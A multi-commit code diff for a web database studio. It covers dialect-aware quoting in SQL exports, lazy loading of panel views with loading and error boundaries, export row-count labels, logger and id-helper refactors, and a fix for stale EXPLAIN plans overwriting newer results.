-      ext = "json";
-    } else if (format === "sql-insert") {
-      const tableName = tabMgr.currentTab.name.replace(/^Query[:  ]*/, "") || "table_name";
-      const columns = Object.keys(data[0] || {});
-      const lines = data.map((row) => {
-        const values = columns.map((col) => {
-          const val = row[col];
-          if (val === null || val === undefined) return "NULL";
-          if (typeof val === "number" || typeof val === "boolean") return String(val);
-          // The exported file is SQL that runs somewhere later, usually unattended,
-          // and every value in it is data the table held. Quoting is therefore the
-          // connected engine's own: doubling the quote alone would let a value
-          // ending in a backslash close its literal and have the rest of the file
-          // read as statements (#290).
-          return quoteLiteral(String(val), conn.activeConnection?.type);
-        });
-        return `INSERT INTO ${tableName} (${columns.join(", ")}) VALUES (${values.join(", ")});`;
-      });
-      content = lines.join("\n");
-      mimeType = "text/sql";
-      ext = "sql";
-    } else if (format === "sql-ddl") {
-      const tableName = tabMgr.currentTab.name.replace(/^Query[:  ]*/, "") || "table_name";
-      const columns = Object.keys(data[0] || {});
-      const colDefs = columns.map((col) => {
-        const sampleVal = data[0]?.[col];
-        let sqlType = "TEXT";
-        if (typeof sampleVal === "number") {
-          sqlType = Number.isInteger(sampleVal) ? "INTEGER" : "NUMERIC";
-        } else if (typeof sampleVal === "boolean") {
-          sqlType = "BOOLEAN";
-        } else if (sampleVal instanceof Date) {
-          sqlType = "TIMESTAMP";
-        }
-        return `  ${col} ${sqlType}`;
-      });
-      content = `CREATE TABLE ${tableName} (\n${colDefs.join(",\n")}\n);`;
-      mimeType = "text/sql";
-      ext = "sql";
-    }
-
-    const fileName = `query_result_export.${ext}`;
-    const blob = new Blob([content], { type: mimeType });
-    const url = URL.createObjectURL(blob);
-    const link = document.createElement("a");
-    link.href = url;
-    link.download = fileName;
-    link.click();
-    URL.revokeObjectURL(url);
+    const file = buildResultExport(format, {
+      rows,
+      fields,
+      tabName: tabMgr.currentTab.name,
+      dialect: conn.activeConnection?.type,
+    });
+    downloadText(file.content, file.mimeType, `query_result_export.${file.extension}`);
   };
 
   const onTableClick = (tableName: string) => {
@@ -507,7 +464,11 @@ export default function Studio() {
 
             <main className="flex-1 overflow-hidden relative">
               <AnimatePresence>
-                {showDiagram && <SchemaDiagram schema={conn.schema} onClose={() => setShowDiagram(false)} />}
+                {showDiagram && (
+                  <React.Suspense fallback={null}>
+                    <SchemaDiagram schema={conn.schema} onClose={() => setShowDiagram(false)} />
+                  </React.Suspense>
+                )}
               </AnimatePresence>
 
               {/* Mobile: Database Tab */}

--- a/src/components/schema-diagram/export.ts
+++ b/src/components/schema-diagram/export.ts
@@ -1,4 +1,5 @@
 import { getViewportForBounds, type Rect, type Viewport } from "@xyflow/react";
+import { downloadBlob } from "@/lib/export/download";
 
 // Browser canvas hard limits (Chrome/Safari, canvas-size test data): a canvas
 // over 16384px per side or ~268M pixels of area draws NOTHING - the failure
@@ -76,15 +77,6 @@ export function buildExportFilename(format: "png" | "svg"): string {
   return `erd_${Date.now()}.${format}`;
 }
 
-function downloadBlob(filename: string, blob: Blob): void {
-  const url = URL.createObjectURL(blob);
-  const link = document.createElement("a");
-  link.download = filename;
-  link.href = url;
-  link.click();
-  URL.revokeObjectURL(url);
-}
-
 export interface ExportViewportOptions {
   viewport: HTMLElement;
   bounds: Rect;
@@ -145,8 +137,8 @@ export async function exportViewportImage(format: "png" | "svg", options: Export
     if (!blob) {
       throw new Error("PNG encoding produced no data");
     }
-    downloadBlob(buildExportFilename("png"), blob);
+    downloadBlob(blob, buildExportFilename("png"));
   } else {
-    downloadBlob(buildExportFilename("svg"), svgDataUrlToBlob(capture.url, background));
+    downloadBlob(svgDataUrlToBlob(capture.url, background), buildExportFilename("svg"));
   }
 }

--- a/src/components/studio/BottomPanel.tsx
+++ b/src/components/studio/BottomPanel.tsx
@@ -7,13 +7,9 @@ import type { MaskingConfig } from "@/lib/data-masking";
 import type { AgentArtifactHydration } from "@/components/agent/hydration";
 import type { CellChange } from "@/components/ResultsGrid";
 import { ResultsGrid } from "@/components/ResultsGrid";
-import { PivotTable } from "@/components/PivotTable";
-import { DatabaseDocs } from "@/components/DatabaseDocs";
-import { VisualExplain } from "@/components/VisualExplain";
 import { QueryHistory } from "@/components/QueryHistory";
 import { SavedQueries } from "@/components/SavedQueries";
-import { DataCharts } from "@/components/DataCharts";
-import { SchemaDiff } from "@/components/SchemaDiff";
+
 import { resolveExplainPlan } from "@/lib/explain";
 import { cn } from "@/lib/utils";
 import {
@@ -26,6 +22,7 @@ import {
   GitCompare,
   LayoutDashboard,
   LayoutGrid,
+  LoaderCircle,
   Terminal,
   X,
   Zap,
@@ -50,8 +47,52 @@ export type BottomPanelMode =
   | "schemadiff"
   | "dashboard";
 
-// Lazy-loaded chart dashboard
-function ChartDashboardLazy({ result }: { result: QueryResult | null }) {
+/*
+  The panel's heavy views, split out of the first load.
+
+  Each one is already gated on `mode`, so only one of them can be on screen and most
+  sessions never open the others — but a static import puts every one of them, and the
+  libraries they pull in, into the bundle that has to arrive before the editor can be
+  typed in. `DataCharts` alone brings recharts; `VisualExplain` and `SchemaDiff` bring
+  their own trees.
+
+  `React.lazy` rather than `next/dynamic`: this file is reached from BOTH shells, and
+  the embeddable one (`src/workspace/StudioWorkspace.tsx`) deliberately imports nothing
+  from `next` — a `next/dynamic` here would put the framework into the published
+  package's module graph. Next's bundler splits on the dynamic `import()` either way.
+
+  Not split: `ResultsGrid` is the default view and would only trade a chunk for a
+  flash, and `QueryHistory`/`SavedQueries` are small and pull in nothing heavy.
+*/
+const PivotTable = React.lazy(() => import("@/components/PivotTable").then((m) => ({ default: m.PivotTable })));
+const DatabaseDocs = React.lazy(() => import("@/components/DatabaseDocs").then((m) => ({ default: m.DatabaseDocs })));
+const VisualExplain = React.lazy(() =>
+  import("@/components/VisualExplain").then((m) => ({ default: m.VisualExplain })),
+);
+const DataCharts = React.lazy(() => import("@/components/DataCharts").then((m) => ({ default: m.DataCharts })));
+const SchemaDiff = React.lazy(() => import("@/components/SchemaDiff").then((m) => ({ default: m.SchemaDiff })));
+
+/**
+ * What the panel shows while a split view's chunk is on the wire.
+ *
+ * `LoaderCircle`, not `Loader2`: on lucide-react 1.x the latter is a legacy-rename
+ * alias that ships no `@deprecated` tag, so nothing warns while it is alive and the
+ * first signal is a build breaking on the release that drops it (docs/BACKLOG.md P6).
+ * The 21 sites that entry counts are its to migrate; this one starts canonical.
+ */
+function PanelLoading() {
+  return (
+    // `output` rather than a div with role="status": it carries the live region
+    // natively, which is what jsx-a11y's prefer-tag-over-role asks for.
+    <output className="h-full flex items-center justify-center bg-sunken" aria-label="Loading the panel">
+      <LoaderCircle strokeWidth={1.5} className="w-5 h-5 animate-spin text-fg-muted" />
+    </output>
+  );
+}
+
+// The saved-chart dashboard. Its data is read on mount, not its module — the module
+// is split at the import above, along with the `DataCharts` this renders.
+function ChartDashboard({ result }: { result: QueryResult | null }) {
   const [savedCharts, setSavedCharts] = React.useState<
     { id: string; name: string; chartType: string; xAxis: string; yAxis: string[] }[]
   >([]);
@@ -339,81 +380,85 @@ export function BottomPanel({
       )}
 
       <div className="flex-1 overflow-hidden relative">
-        {mode === "pivot" ? (
-          <PivotTable
-            result={currentTab.result}
-            onLoadQuery={(q) => {
-              onLoadQuery(q);
-              onSetMode("results");
-            }}
-            databaseType={activeConnection?.type}
-          />
-        ) : mode === "docs" ? (
-          <DatabaseDocs schema={schema} schemaContext={schemaContext} databaseType={activeConnection?.type} />
-        ) : mode === "history" ? (
-          <QueryHistory
-            refreshTrigger={historyKey}
-            activeConnectionId={activeConnection?.id}
-            onSelectQuery={(q) => {
-              onLoadQuery(q);
-              onSetMode("results");
-            }}
-          />
-        ) : mode === "saved" ? (
-          <SavedQueries
-            refreshTrigger={savedKey}
-            connectionType={activeConnection?.type}
-            onSelectQuery={(q) => {
-              onLoadQuery(q);
-              onSetMode("results");
-            }}
-          />
-        ) : mode === "charts" ? (
-          <DataCharts result={hydratedChart ?? currentTab.result} spec={hydratedChartSpec} />
-        ) : mode === "schemadiff" ? (
-          <SchemaDiff schema={schema} connection={activeConnection} />
-        ) : mode === "dashboard" ? (
-          <ChartDashboardLazy result={currentTab.result} />
-        ) : mode === "explain" ? (
-          <VisualExplain
-            plan={hydratedPlan ?? explainInput}
-            /*
+        {/* One boundary for the whole switch: only one view is ever mounted, and the
+            fallback is what the user sees for the moment a split chunk is in flight. */}
+        <React.Suspense fallback={<PanelLoading />}>
+          {mode === "pivot" ? (
+            <PivotTable
+              result={currentTab.result}
+              onLoadQuery={(q) => {
+                onLoadQuery(q);
+                onSetMode("results");
+              }}
+              databaseType={activeConnection?.type}
+            />
+          ) : mode === "docs" ? (
+            <DatabaseDocs schema={schema} schemaContext={schemaContext} databaseType={activeConnection?.type} />
+          ) : mode === "history" ? (
+            <QueryHistory
+              refreshTrigger={historyKey}
+              activeConnectionId={activeConnection?.id}
+              onSelectQuery={(q) => {
+                onLoadQuery(q);
+                onSetMode("results");
+              }}
+            />
+          ) : mode === "saved" ? (
+            <SavedQueries
+              refreshTrigger={savedKey}
+              connectionType={activeConnection?.type}
+              onSelectQuery={(q) => {
+                onLoadQuery(q);
+                onSetMode("results");
+              }}
+            />
+          ) : mode === "charts" ? (
+            <DataCharts result={hydratedChart ?? currentTab.result} spec={hydratedChartSpec} />
+          ) : mode === "schemadiff" ? (
+            <SchemaDiff schema={schema} connection={activeConnection} />
+          ) : mode === "dashboard" ? (
+            <ChartDashboard result={currentTab.result} />
+          ) : mode === "explain" ? (
+            <VisualExplain
+              plan={hydratedPlan ?? explainInput}
+              /*
               A run's plan travels without the editor's statement. The AI analysis in
               this view posts the query and the plan together, so pairing a hydrated
               plan with whatever happens to be in the editor would ask for an
               explanation of a statement that never produced it; with no query the view
               says so itself instead.
             */
-            query={hydratedPlan === null ? currentTab.query : undefined}
-            schemaContext={schemaContext}
-            databaseType={activeConnection?.type}
-            onLoadQuery={(q) => {
-              onLoadQuery(q);
-              onSetMode("results");
-            }}
-          />
-        ) : displayedResult ? (
-          <ResultsGrid
-            result={displayedResult}
-            onLoadMore={hydratedHere ? undefined : onLoadMore}
-            isLoadingMore={isLoadingMore}
-            maskingEnabled={maskingEnabled}
-            onToggleMasking={onToggleMasking}
-            userRole={userRole}
-            maskingConfig={maskingConfig}
-            editingEnabled={hydratedHere ? false : editingEnabled}
-            pendingChanges={pendingChanges}
-            onCellChange={onCellChange}
-            onApplyChanges={onApplyChanges}
-            onDiscardChanges={onDiscardChanges}
-          />
-        ) : (
-          <div className="h-full flex flex-col items-center justify-center opacity-20 bg-surface">
-            <Terminal strokeWidth={1.5} className="w-12 h-12 mb-4" />
-            <p className="text-xs font-medium">Execute a query or check history</p>
-            <p className="text-xs mt-2">Ready to query</p>
-          </div>
-        )}
+              query={hydratedPlan === null ? currentTab.query : undefined}
+              schemaContext={schemaContext}
+              databaseType={activeConnection?.type}
+              onLoadQuery={(q) => {
+                onLoadQuery(q);
+                onSetMode("results");
+              }}
+            />
+          ) : displayedResult ? (
+            <ResultsGrid
+              result={displayedResult}
+              onLoadMore={hydratedHere ? undefined : onLoadMore}
+              isLoadingMore={isLoadingMore}
+              maskingEnabled={maskingEnabled}
+              onToggleMasking={onToggleMasking}
+              userRole={userRole}
+              maskingConfig={maskingConfig}
+              editingEnabled={hydratedHere ? false : editingEnabled}
+              pendingChanges={pendingChanges}
+              onCellChange={onCellChange}
+              onApplyChanges={onApplyChanges}
+              onDiscardChanges={onDiscardChanges}
+            />
+          ) : (
+            <div className="h-full flex flex-col items-center justify-center opacity-20 bg-surface">
+              <Terminal strokeWidth={1.5} className="w-12 h-12 mb-4" />
+              <p className="text-xs font-medium">Execute a query or check history</p>
+              <p className="text-xs mt-2">Ready to query</p>
+            </div>
+          )}
+        </React.Suspense>
       </div>
     </div>
   );

--- a/src/components/studio/BottomPanel.tsx
+++ b/src/components/studio/BottomPanel.tsx
@@ -9,6 +9,10 @@ import type { CellChange } from "@/components/ResultsGrid";
 import { ResultsGrid } from "@/components/ResultsGrid";
 import { QueryHistory } from "@/components/QueryHistory";
 import { SavedQueries } from "@/components/SavedQueries";
+import { ChunkBoundary, ViewLoading } from "@/components/LazyView";
+import { lazyRetry } from "@/lib/lazy";
+import { describeExportScope } from "@/lib/export/scope";
+import type { ResultExportFormat } from "@/lib/export/result-export";
 
 import { resolveExplainPlan } from "@/lib/explain";
 import { cn } from "@/lib/utils";
@@ -22,7 +26,6 @@ import {
   GitCompare,
   LayoutDashboard,
   LayoutGrid,
-  LoaderCircle,
   Terminal,
   X,
   Zap,
@@ -31,6 +34,7 @@ import {
   DropdownMenu,
   DropdownMenuContent,
   DropdownMenuItem,
+  DropdownMenuSeparator,
   DropdownMenuTrigger,
 } from "@/components/ui/dropdown-menu";
 import { Button } from "@/components/ui/button";
@@ -63,32 +67,27 @@ export type BottomPanelMode =
 
   Not split: `ResultsGrid` is the default view and would only trade a chunk for a
   flash, and `QueryHistory`/`SavedQueries` are small and pull in nothing heavy.
-*/
-const PivotTable = React.lazy(() => import("@/components/PivotTable").then((m) => ({ default: m.PivotTable })));
-const DatabaseDocs = React.lazy(() => import("@/components/DatabaseDocs").then((m) => ({ default: m.DatabaseDocs })));
-const VisualExplain = React.lazy(() =>
-  import("@/components/VisualExplain").then((m) => ({ default: m.VisualExplain })),
-);
-const DataCharts = React.lazy(() => import("@/components/DataCharts").then((m) => ({ default: m.DataCharts })));
-const SchemaDiff = React.lazy(() => import("@/components/SchemaDiff").then((m) => ({ default: m.SchemaDiff })));
 
-/**
- * What the panel shows while a split view's chunk is on the wire.
- *
- * `LoaderCircle`, not `Loader2`: on lucide-react 1.x the latter is a legacy-rename
- * alias that ships no `@deprecated` tag, so nothing warns while it is alive and the
- * first signal is a build breaking on the release that drops it (docs/BACKLOG.md P6).
- * The 21 sites that entry counts are its to migrate; this one starts canonical.
- */
-function PanelLoading() {
-  return (
-    // `output` rather than a div with role="status": it carries the live region
-    // natively, which is what jsx-a11y's prefer-tag-over-role asks for.
-    <output className="h-full flex items-center justify-center bg-sunken" aria-label="Loading the panel">
-      <LoaderCircle strokeWidth={1.5} className="w-5 h-5 animate-spin text-fg-muted" />
-    </output>
-  );
-}
+  Each loader is wrapped in `lazyRetry`, and the whole switch sits in a
+  `ChunkBoundary`: a view that is no longer in the first load is a request that can
+  fail, and this product runs where those fail — behind proxies, air-gapped, and
+  across an upgrade that renames every chunk under an open tab.
+*/
+const PivotTable = React.lazy(
+  lazyRetry(() => import("@/components/PivotTable").then((m) => ({ default: m.PivotTable }))),
+);
+const DatabaseDocs = React.lazy(
+  lazyRetry(() => import("@/components/DatabaseDocs").then((m) => ({ default: m.DatabaseDocs }))),
+);
+const VisualExplain = React.lazy(
+  lazyRetry(() => import("@/components/VisualExplain").then((m) => ({ default: m.VisualExplain }))),
+);
+const DataCharts = React.lazy(
+  lazyRetry(() => import("@/components/DataCharts").then((m) => ({ default: m.DataCharts }))),
+);
+const SchemaDiff = React.lazy(
+  lazyRetry(() => import("@/components/SchemaDiff").then((m) => ({ default: m.SchemaDiff }))),
+);
 
 // The saved-chart dashboard. Its data is read on mount, not its module — the module
 // is split at the import above, along with the `DataCharts` this renders.
@@ -165,7 +164,9 @@ interface BottomPanelProps {
   onLoadQuery: (query: string) => void;
   onLoadMore: (() => void) | undefined;
   isLoadingMore: boolean | undefined;
-  onExportResults: (format: "csv" | "json" | "sql-insert" | "sql-ddl") => void;
+  // The writer's own type, so a format added there cannot silently fail to reach this
+  // menu — the drift between two spellings of one list is what this PR is about.
+  onExportResults: (format: ResultExportFormat) => void;
   /**
    * A result an agent run stored, shown in the surface that already renders that
    * kind of result (#329 T11). Optional so every other caller — the embedded shell
@@ -236,6 +237,9 @@ export function BottomPanel({
       (mode === "explain" && hydratedPlan !== null) ||
       (mode === "charts" && hydratedChart !== null));
   const displayedResult = hydratedResult ?? currentTab.result;
+  // How much of the result an export would write — the count the button carries and
+  // the shortfall the menu states. Derived here so both read the same numbers.
+  const exportScope = describeExportScope(displayedResult ?? { rows: [] });
 
   const tabs: { key: BottomPanelMode; label: string; icon: React.ReactNode; activeClass: string }[] = [
     {
@@ -328,10 +332,26 @@ export function BottomPanel({
                     size="sm"
                     className="h-7 text-xs font-medium text-fg-muted hover:text-fg-bright gap-2"
                   >
+                    {/*
+                      The count belongs ON the button because it is what the button
+                      does: an export writes the rows the grid HOLDS, which is one
+                      page, and a file of 500 rows off a table of two million looks
+                      exactly like a complete answer once it has left the product.
+                    */}
                     <Download strokeWidth={1.5} className="w-3 h-3" /> Export
+                    <span data-testid="export-row-count" className="font-mono text-fg-subtle">
+                      {exportScope.countLabel}
+                    </span>
                   </Button>
                 </DropdownMenuTrigger>
                 <DropdownMenuContent align="end" className="bg-raised border-hairline-strong text-fg-secondary">
+                  <div data-testid="export-scope" className="px-2 py-1.5 text-xs text-fg-muted max-w-[15rem]">
+                    {exportScope.summary}
+                    {exportScope.shortfall !== null && (
+                      <span className="block mt-1 text-amber-400/80">{exportScope.shortfall}</span>
+                    )}
+                  </div>
+                  <DropdownMenuSeparator className="bg-hairline" />
                   <DropdownMenuItem onClick={() => onExportResults("csv")} className="text-xs cursor-pointer">
                     Export as CSV
                   </DropdownMenuItem>
@@ -380,85 +400,88 @@ export function BottomPanel({
       )}
 
       <div className="flex-1 overflow-hidden relative">
-        {/* One boundary for the whole switch: only one view is ever mounted, and the
-            fallback is what the user sees for the moment a split chunk is in flight. */}
-        <React.Suspense fallback={<PanelLoading />}>
-          {mode === "pivot" ? (
-            <PivotTable
-              result={currentTab.result}
-              onLoadQuery={(q) => {
-                onLoadQuery(q);
-                onSetMode("results");
-              }}
-              databaseType={activeConnection?.type}
-            />
-          ) : mode === "docs" ? (
-            <DatabaseDocs schema={schema} schemaContext={schemaContext} databaseType={activeConnection?.type} />
-          ) : mode === "history" ? (
-            <QueryHistory
-              refreshTrigger={historyKey}
-              activeConnectionId={activeConnection?.id}
-              onSelectQuery={(q) => {
-                onLoadQuery(q);
-                onSetMode("results");
-              }}
-            />
-          ) : mode === "saved" ? (
-            <SavedQueries
-              refreshTrigger={savedKey}
-              connectionType={activeConnection?.type}
-              onSelectQuery={(q) => {
-                onLoadQuery(q);
-                onSetMode("results");
-              }}
-            />
-          ) : mode === "charts" ? (
-            <DataCharts result={hydratedChart ?? currentTab.result} spec={hydratedChartSpec} />
-          ) : mode === "schemadiff" ? (
-            <SchemaDiff schema={schema} connection={activeConnection} />
-          ) : mode === "dashboard" ? (
-            <ChartDashboard result={currentTab.result} />
-          ) : mode === "explain" ? (
-            <VisualExplain
-              plan={hydratedPlan ?? explainInput}
-              /*
+        {/* One pair of boundaries for the whole switch: only one view is ever mounted,
+            so the fallback is what the user sees while a split chunk is in flight and
+            the error boundary is what they see when it never arrives. */}
+        <ChunkBoundary label="This view">
+          <React.Suspense fallback={<ViewLoading label="Loading the panel" />}>
+            {mode === "pivot" ? (
+              <PivotTable
+                result={currentTab.result}
+                onLoadQuery={(q) => {
+                  onLoadQuery(q);
+                  onSetMode("results");
+                }}
+                databaseType={activeConnection?.type}
+              />
+            ) : mode === "docs" ? (
+              <DatabaseDocs schema={schema} schemaContext={schemaContext} databaseType={activeConnection?.type} />
+            ) : mode === "history" ? (
+              <QueryHistory
+                refreshTrigger={historyKey}
+                activeConnectionId={activeConnection?.id}
+                onSelectQuery={(q) => {
+                  onLoadQuery(q);
+                  onSetMode("results");
+                }}
+              />
+            ) : mode === "saved" ? (
+              <SavedQueries
+                refreshTrigger={savedKey}
+                connectionType={activeConnection?.type}
+                onSelectQuery={(q) => {
+                  onLoadQuery(q);
+                  onSetMode("results");
+                }}
+              />
+            ) : mode === "charts" ? (
+              <DataCharts result={hydratedChart ?? currentTab.result} spec={hydratedChartSpec} />
+            ) : mode === "schemadiff" ? (
+              <SchemaDiff schema={schema} connection={activeConnection} />
+            ) : mode === "dashboard" ? (
+              <ChartDashboard result={currentTab.result} />
+            ) : mode === "explain" ? (
+              <VisualExplain
+                plan={hydratedPlan ?? explainInput}
+                /*
               A run's plan travels without the editor's statement. The AI analysis in
               this view posts the query and the plan together, so pairing a hydrated
               plan with whatever happens to be in the editor would ask for an
               explanation of a statement that never produced it; with no query the view
               says so itself instead.
             */
-              query={hydratedPlan === null ? currentTab.query : undefined}
-              schemaContext={schemaContext}
-              databaseType={activeConnection?.type}
-              onLoadQuery={(q) => {
-                onLoadQuery(q);
-                onSetMode("results");
-              }}
-            />
-          ) : displayedResult ? (
-            <ResultsGrid
-              result={displayedResult}
-              onLoadMore={hydratedHere ? undefined : onLoadMore}
-              isLoadingMore={isLoadingMore}
-              maskingEnabled={maskingEnabled}
-              onToggleMasking={onToggleMasking}
-              userRole={userRole}
-              maskingConfig={maskingConfig}
-              editingEnabled={hydratedHere ? false : editingEnabled}
-              pendingChanges={pendingChanges}
-              onCellChange={onCellChange}
-              onApplyChanges={onApplyChanges}
-              onDiscardChanges={onDiscardChanges}
-            />
-          ) : (
-            <div className="h-full flex flex-col items-center justify-center opacity-20 bg-surface">
-              <Terminal strokeWidth={1.5} className="w-12 h-12 mb-4" />
-              <p className="text-xs font-medium">Execute a query or check history</p>
-              <p className="text-xs mt-2">Ready to query</p>
-            </div>
-          )}
-        </React.Suspense>
+                query={hydratedPlan === null ? currentTab.query : undefined}
+                schemaContext={schemaContext}
+                databaseType={activeConnection?.type}
+                onLoadQuery={(q) => {
+                  onLoadQuery(q);
+                  onSetMode("results");
+                }}
+              />
+            ) : displayedResult ? (
+              <ResultsGrid
+                result={displayedResult}
+                onLoadMore={hydratedHere ? undefined : onLoadMore}
+                isLoadingMore={isLoadingMore}
+                maskingEnabled={maskingEnabled}
+                onToggleMasking={onToggleMasking}
+                userRole={userRole}
+                maskingConfig={maskingConfig}
+                editingEnabled={hydratedHere ? false : editingEnabled}
+                pendingChanges={pendingChanges}
+                onCellChange={onCellChange}
+                onApplyChanges={onApplyChanges}
+                onDiscardChanges={onDiscardChanges}
+              />
+            ) : (
+              <div className="h-full flex flex-col items-center justify-center opacity-20 bg-surface">
+                <Terminal strokeWidth={1.5} className="w-12 h-12 mb-4" />
+                <p className="text-xs font-medium">Execute a query or check history</p>
+                <p className="text-xs mt-2">Ready to query</p>
+              </div>
+            )}
+          </React.Suspense>
+        </ChunkBoundary>
       </div>
     </div>
   );

--- a/src/components/studio/BottomPanel.tsx
+++ b/src/components/studio/BottomPanel.tsx
@@ -301,9 +301,20 @@ export function BottomPanel({
   const visibleTabs = metadata?.capabilities.explainFormat ? tabs : tabs.filter((tab) => tab.key !== "explain");
 
   return (
-    <div className="h-full flex flex-col bg-sunken">
-      <div className="h-9 bg-surface border-b border-hairline flex items-center justify-between px-2">
-        <div className="flex items-center h-full gap-1">
+    /*
+      A container, not the viewport: everything in this header is sized against the
+      PANEL's width, and the panel loses width to things the viewport knows nothing
+      about — the agent rail opening, the sidebar staying open, a narrowed window.
+    */
+    <div className="h-full flex flex-col bg-sunken @container/panel">
+      <div className="h-9 bg-surface border-b border-hairline flex items-center justify-between gap-2 px-2">
+        {/*
+          The tab strip is the part that yields. It scrolls (without a visible bar in
+          a 36px-tall row) rather than pushing the export group out of the header:
+          nine mode tabs plus a rail plus a sidebar is enough to clip the right-hand
+          side entirely, and what got clipped was the only way to save a result.
+        */}
+        <div className="flex items-center h-full gap-1 min-w-0 overflow-x-auto [scrollbar-width:none] [&::-webkit-scrollbar]:hidden">
           {visibleTabs.map((tab) => (
             <button
               key={tab.key}
@@ -320,8 +331,15 @@ export function BottomPanel({
         </div>
 
         {displayedResult && mode === "results" && (
-          <div className="flex items-center gap-1">
-            <span className="text-xs font-mono text-fg-muted mr-2">
+          // Never shrinks: Export is the only way a result leaves the product, so it
+          // is the last thing that may be given up for width.
+          <div className="flex items-center gap-1 shrink-0">
+            {/*
+              Dropped first when the panel is narrow, because it is the only thing here
+              that is said twice — the stats bar directly below carries the row count,
+              and EXEC TIME carries the duration.
+            */}
+            <span className="hidden @4xl/panel:inline text-xs font-mono text-fg-muted mr-2">
               {displayedResult.rowCount} rows • {displayedResult.executionTime}ms
             </span>
             {!hydratedHere && (

--- a/src/hooks/use-auth.ts
+++ b/src/hooks/use-auth.ts
@@ -3,6 +3,7 @@
 import { useState, useEffect, useCallback } from "react";
 import { useRouter } from "next/navigation";
 import { useToast } from "@/hooks/use-toast";
+import { logger } from "@/lib/logger";
 
 interface AuthUser {
   role?: string;
@@ -22,7 +23,10 @@ export function useAuth() {
           setUser(data.user);
         }
       } catch (error) {
-        console.error("Failed to fetch user:", error);
+        logger.warn("Failed to fetch the signed-in user", {
+          route: "use-auth",
+          error: error instanceof Error ? error.message : String(error),
+        });
       }
     };
     fetchUser();

--- a/src/hooks/use-connection-form.ts
+++ b/src/hooks/use-connection-form.ts
@@ -12,6 +12,7 @@ import {
 } from "@/lib/types";
 import { getDBConfig } from "@/lib/db-ui-config";
 import { parseConnectionString } from "@/lib/connection-string-parser";
+import { newLocalId } from "@/lib/ids";
 
 /**
  * Whether this editor OWNS a connection field or merely carries it.
@@ -232,7 +233,7 @@ export function useConnectionForm({ isOpen, onConnect, editConnection, onTestCon
     return {
       // First, so a form-owned field always wins; nothing below is preserved.
       ...preservedFields(editConnection),
-      id: editConnection?.id || Math.random().toString(36).substr(2, 9),
+      id: editConnection?.id || newLocalId(),
       name: name || `${type}-connection`,
       type,
       ...(addressedFields.has("host") ? { host } : {}),

--- a/src/hooks/use-provider-metadata.ts
+++ b/src/hooks/use-provider-metadata.ts
@@ -3,6 +3,7 @@
 import { useState, useEffect, useRef } from "react";
 import type { DatabaseConnection } from "@/lib/types";
 import type { ProviderCapabilities, ProviderLabels } from "@/lib/db/types";
+import { logger } from "@/lib/logger";
 
 export interface ProviderMetadata {
   capabilities: ProviderCapabilities;
@@ -61,7 +62,10 @@ export function useProviderMetadata(connection: DatabaseConnection | null): {
         if (lastConnectionId.current === requestedId) setMetadata(data);
       })
       .catch((err) => {
-        console.error("[useProviderMetadata]", err);
+        logger.warn("Provider metadata request failed", {
+          route: "use-provider-metadata",
+          error: err instanceof Error ? err.message : String(err),
+        });
         if (lastConnectionId.current === requestedId) setMetadata(null);
       })
       .finally(() => {

--- a/src/hooks/use-query-execution.ts
+++ b/src/hooks/use-query-execution.ts
@@ -12,6 +12,7 @@ import { DEFAULT_QUERY_LIMIT } from "@/lib/db/utils/query-limiter";
 import { shouldRefreshSchema } from "@/lib/query-generators";
 import { ApiErrorCode } from "@/lib/api/error-codes";
 import { logger } from "@/lib/logger";
+import { newLocalId } from "@/lib/ids";
 import { getExplainStrategy } from "@/lib/explain";
 import { maybeInviteToStar } from "@/lib/community/star-prompt-toast";
 import { buildConnectionPayload } from "./use-connection-payload";
@@ -40,23 +41,6 @@ interface UseQueryExecutionParams {
   playgroundMode: boolean;
   fetchSchema: (conn: DatabaseConnection) => Promise<void>;
   queryEditorRef: RefObject<QueryEditorRef | null>;
-}
-
-/**
- * The id one history entry is filed under.
- *
- * `crypto.getRandomValues` rather than `Math.random`, which a scanner reads as a
- * pseudorandom generator standing where a secure one belongs. Nothing here is a
- * secret — the id names a row in this browser's own query history — but the two cost
- * the same and only one of them has to be argued about in every review.
- *
- * Deliberately NOT `crypto.randomUUID`: it is restricted to secure contexts, and
- * Studio is served over plain HTTP on several of its distribution channels, where it
- * is simply undefined. `getRandomValues` carries no such restriction.
- */
-function newHistoryId(): string {
-  const bytes = crypto.getRandomValues(new Uint32Array(2));
-  return `${bytes[0].toString(36)}${bytes[1].toString(36)}`;
 }
 
 /**
@@ -98,6 +82,21 @@ export function useQueryExecution({
    */
   const runsRef = useRef(new Map<string, { controller: AbortController; queryId: string }>());
 
+  /**
+   * The id of the LAST run started on each tab — which run owns the tab's results.
+   *
+   * Separate from `runsRef` because it has to outlive the entry there. `runsRef` is
+   * about cancellation, so a run deletes its own entry the moment it settles; a
+   * background EXPLAIN outlives its query and asks about ownership afterwards, and
+   * an absent entry cannot answer. Reading absence as "not superseded" was right for
+   * the common case (the plan still describes the results on screen) and wrong for
+   * the one that mattered: run A finishes, run B runs and finishes, then A's slow
+   * EXPLAIN resolves, finds nothing, and writes A's plan over B's results
+   * (docs/BACKLOG.md U1). This map is never cleared per run, so it answers for that
+   * window too.
+   */
+  const lastRunRef = useRef(new Map<string, string>());
+
   // Latest-value refs. `executeQuery` reads these at call time only, so keeping
   // them out of its dependency list makes the callback identity stable across a
   // keystroke — which is what stops the `execute-query` listener below from being
@@ -115,9 +114,11 @@ export function useQueryExecution({
   // tab's run, not just the last one started.
   useEffect(() => {
     const runs = runsRef.current;
+    const lastRuns = lastRunRef.current;
     return () => {
       for (const run of runs.values()) run.controller.abort();
       runs.clear();
+      lastRuns.clear();
     };
   }, []);
 
@@ -230,19 +231,21 @@ export function useQueryExecution({
       // statement. Scoped to `targetTabId` so a run in another tab is left alone.
       runsRef.current.get(targetTabId)?.controller.abort();
       const abortController = new AbortController();
-      const queryId = `q-${Date.now()}-${newHistoryId()}`;
+      const queryId = `q-${Date.now()}-${newLocalId()}`;
       runsRef.current.set(targetTabId, { controller: abortController, queryId });
+      lastRunRef.current.set(targetTabId, queryId);
 
       /**
-       * A newer run has taken THIS TAB over. An absent entry is deliberately NOT
-       * superseded: the run finished and cleared itself, and the background
-       * EXPLAIN outlives its own query — its plan is still the right plan for the
-       * results on screen.
+       * A newer run has taken THIS TAB over.
+       *
+       * Asked of `lastRunRef`, not of the in-flight map: while this run is the
+       * latest one the answer is the same either way, and once it has settled and
+       * removed its own entry only this map still knows whether anything started
+       * after it. That is what lets a background EXPLAIN outlive its own query — its
+       * plan still describes the results on screen — without letting it outlive the
+       * NEXT one (U1).
        */
-      const isSuperseded = () => {
-        const active = runsRef.current.get(targetTabId);
-        return active !== undefined && active.queryId !== queryId;
